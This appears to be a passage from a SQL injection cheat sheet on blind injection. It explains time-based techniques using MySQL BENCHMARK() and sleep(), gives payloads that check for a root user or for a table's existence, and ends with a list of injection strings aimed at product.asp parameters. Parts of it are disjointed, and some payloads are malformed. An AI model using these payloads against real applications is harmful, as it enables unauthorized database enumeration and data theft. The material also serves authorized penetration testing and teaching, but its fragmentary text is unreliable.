In a quite good production application generally you can not see error responses on the page, so you can not extract data through Union attacks or error based attacks. You have to do use Blind SQL Injections attacks to extract data. There are two kind of Blind Sql Injections.
In normal blinds you can use if statements or abuse WHERE query in injection (generally easier).
In totally blinds you need to use some waiting functions and analyze response times. For this you can use BENCHMARK() and sleep(10) in MySQL.
This output taken from a real private Blind SQL Injection tool while exploiting SQL Server back ended application and enumerating table names.
Use this if it's really blind, otherwise just use 1/0 style errors to identify difference.
Be careful while using times more than 20-30 seconds; database API connection or script can be timeout.
BENCHMARK()
Basically, we are abusing this command to make MySQL wait a bit. Be careful you will consume web servers limit so fast!
BENCHMARK(howmanytimes, do this)
Are we root?
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))
Check Table exist in MySQL
IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))
These tests are simply good for blind sql injection and silent attacks.
product.asp?id=4 product.asp?id=5-1 product.asp?id=4 OR 1=1 product.asp?name=Book product.asp?name=Bo'%2b'ok product.asp?name=Bo' || 'ok product.asp?name=Book' OR 'x'='x